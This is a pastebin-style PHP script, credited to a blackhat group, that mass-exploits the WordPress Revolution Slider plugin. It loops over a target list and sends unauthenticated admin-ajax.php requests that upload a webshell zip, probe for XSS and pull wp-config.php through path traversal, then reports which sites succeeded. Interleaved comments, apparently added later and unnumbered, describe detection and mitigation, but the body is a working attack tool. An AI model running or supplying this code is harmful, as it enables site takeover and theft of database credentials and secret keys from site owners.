
Untitled

a guest Oct 12th, 2017 330 Never
  1. <?php
  2. /** me@dwisiswanto.my.id **/
  3.  
  4. /******************************************
  5.  First, install PHP CLI
  6.  USAGE: php exploit.php list-of-target.txt
  7. ******************************************/
  8.  
  // Payload table shared by the four requests in the loop further down: an archive name
  // sent as "update_file", an HTML marker string sent as "data" and as "client_action",
  // and a relative path sent as "img".
  // Defender note: these literal values (the <marquee> marker, a relative path ending in
  // wp-config.php) are the strings to search for in WAF events and request captures for
  // /wp-admin/admin-ajax.php.
  9. $cafc = array(
  10.     "file"=>"revslider.zip", // enter a ur shell file into a zip
  11.     "xss"=>"<marquee>CaFc Versace was Here", // for xss
  12.     "kfg"=>"..\wp-config.php" // for download config
  13. );
  14.  
  /**
   * Thin cURL wrapper: requests $yuerel and returns the response body.
   *
   * When $dataAing is not loosely equal to null the request is sent as a POST with
   * $dataAing as its fields; otherwise no POST options are set.
   *
   * Defender note: every caller in this file passes an array, which cURL encodes as
   * multipart/form-data, so the traffic shows up as multipart POSTs. Redirects are
   * followed, TLS peer verification is switched off, and no User-Agent, cookie or timeout
   * is configured in this function. Confirm against captured traffic before treating any
   * of that as a signature.
   *
   * @param string     $yuerel   Full URL to request.
   * @param array|null $dataAing POST fields, or null for a request without a body.
   * @return string|bool Response body; false when curl_exec() reports a failed transfer.
   */
  15. function hajar($yuerel, $dataAing=null) {
  16.     $cuih = curl_init();
  17.     curl_setopt($cuih, CURLOPT_URL, $yuerel);
  18.     if ($dataAing != null){
  19.         curl_setopt($cuih, CURLOPT_POST, true);
  20.         curl_setopt($cuih, CURLOPT_POSTFIELDS, $dataAing);
  21.     }
  22.     curl_setopt($cuih, CURLOPT_FOLLOWLOCATION, true);
  23.     curl_setopt($cuih, CURLOPT_RETURNTRANSFER, true);
  24.     curl_setopt($cuih, CURLOPT_SSL_VERIFYPEER, false);
  25.     $eks = curl_exec($cuih);
  26.     curl_close($cuih);
  27.     return $eks;
  28. }
  29.  
  // Driver: reads the file named by the first CLI argument, splits it on CRLF into one
  // base URL per entry, and for each entry sends four POSTs, carrying no session cookie or
  // credentials, to <base>/wp-admin/admin-ajax.php.
  // Defender note: the value of this listing is as a description of what the traffic looks
  // like. The printed SUCCESS / NOT VULNERABLE lines are string heuristics on the response
  // body and are not evidence either way; base exposure decisions on the installed plugin
  // release and on file-system and log review. Mitigation is to update or remove the
  // revslider plugin and to reject these actions from unauthenticated clients at the WAF.
  30. $site = @file_get_contents($argv[1]);
  31. $tumbal = explode("\r\n", $site);
  32. echo "Calculate the target list : " . count($tumbal);
  33. if (!isset($site)) {
  34.     echo "Site N/A.";
  35. } else {
  36.     foreach ($tumbal as $uri) {
  37.         echo "\n------------------------------------";
  38.         echo "\nTarget => " . $uri;
  39.         echo "\n";
              // Request 1: action=revslider_ajax_action, client_action=update_plugin, with an
              // "update_file" field. The verdict is taken from the JSON "success"/"message"
              // fields of the reply.
              // Defender note: alert on this action/client_action pair arriving without an
              // authenticated admin session, and audit
              // wp-content/plugins/revslider/temp/update_extract/ for files that do not
              // belong to the vendor package.
  40.         $menta = hajar($uri . "/wp-admin/admin-ajax.php", array(
  41.             "action" => "revslider_ajax_action",
  42.             "client_action" => "update_plugin",
  43.             "update_file" => $cafc['file'])
  44.         );
  45.         $jason = json_decode($menta, true);
  46.         if ($jason['success'] == false || $jason['message'] == "Wrong request") {
  47.             echo "\nExploit [update_plugin] => NOT VULNERABLE";
  48.         } else {
  49.             echo "\nExploit [update_plugin] => SUCCESS";
  50.             echo "\n[+] " . $uri . "/wp-content/plugins/revslider/temp/update_extract/revslider/YOUR_FILE.php\n";
  51.         }
  52.  
              // Request 2: client_action=get_captions_css with the HTML marker in "data".
              // Only the JSON "success" field is inspected; whether the marker is reflected
              // unescaped is not checked here.
              // Defender note: the server-side remedy for this class of issue is an
              // authorization check on the action plus output encoding of echoed input.
  53.         $menta2 = hajar($uri . "/wp-admin/admin-ajax.php", array(
  54.             "action" => "revslider_ajax_action",
  55.             "client_action" => "get_captions_css",
  56.             "data" => $cafc['xss'])
  57.         );
  58.         $jasonB = json_decode($menta2, true);
  59.         if ($jasonB['success'] == false || $jason['message'] == "Wrong request") {
  60.             echo "\nExploit [get_captions_css] => NOT VULNERABLE";
  61.         } elseif ($jasonB['success'] == true) {
  62.             echo "\nExploit [get_captions_css] => SUCCESS";
  63.             echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
  64.             echo "action=revslider_ajax_action&";
  65.             echo "client_action=get_captions_css";
  66.             echo "data=" . urlencode($cafc['xss']) . "\n";
  67.         }
  68.  
              // Request 3: the HTML marker is sent as the client_action value itself. A reply
              // whose "message" matches /wrong ajax action/i is counted as a hit, presumably
              // because that error text echoes the submitted action name (not verified here).
              // Defender note: markup characters in the client_action parameter are a
              // low-noise detection rule, since legitimate values are plain identifiers.
  69.         $menta3 = hajar($uri . "/wp-admin/admin-ajax.php", array(
  70.             "action" => "revslider_ajax_action",
  71.             "client_action" => $cafc['xss'])
  72.         );
  73.         $jasonC = json_decode($menta3, true);
  74.         if (preg_match("/wrong ajax action/i", $jasonC['message'])) {
  75.             echo "\nExploit [xss] => SUCCESS";
  76.             echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
  77.             echo "action=revslider_ajax_action";
  78.             echo "client_action=" . urlencode($cafc['xss']) . "\n";
  79.         } else {
  80.             echo "\nExploit [xss] => NOT VULNERABLE";
  81.         }
  82.  
              // Request 4: action=revslider_show_image with "img" set to the relative
              // wp-config.php path. The raw reply is compared loosely against two error strings.
              // Defender note: wp-config.php holds the database credentials and the auth
              // keys/salts. If logs show this action with a path-like "img" value answered by
              // non-image content, rotate the database password and the salts, then review
              // for follow-on access.
  83.         $menta4 = hajar($uri . "/wp-admin/admin-ajax.php", array(
  84.             "action" => "revslider_show_image",
  85.             "img" => $cafc['kfg']),
  86.         $uri);
  87.         if ($menta4 == "empty image" || $menta4 == "image file not found" || $menta4 == 0) {
  88.             echo "\nExploit [wp-config] => NOT VULNERABLE\n";
  89.         } else {
  90.             echo "\nExploit [wp-config] => SUCCESS";
  91.             echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
  92.             echo "action=revslider_show_image";
  93.             echo "img=" . $cafc['kfg'] . "\n";
  94.         }
  95.     }
  96. }
  97. ?>
  98. -------------------------------------------------------------------------------------
  99.  
  100.  
  101. # Credits :
  102. -------------------------------------------------------------------------------------
  103. CaFc Versace
  104. Thanks : Agency CaFc - Surabaya BlackHat
  105. -------------------------------------------------------------------------------------
  106.  
  107.  
  108. ./learn to be better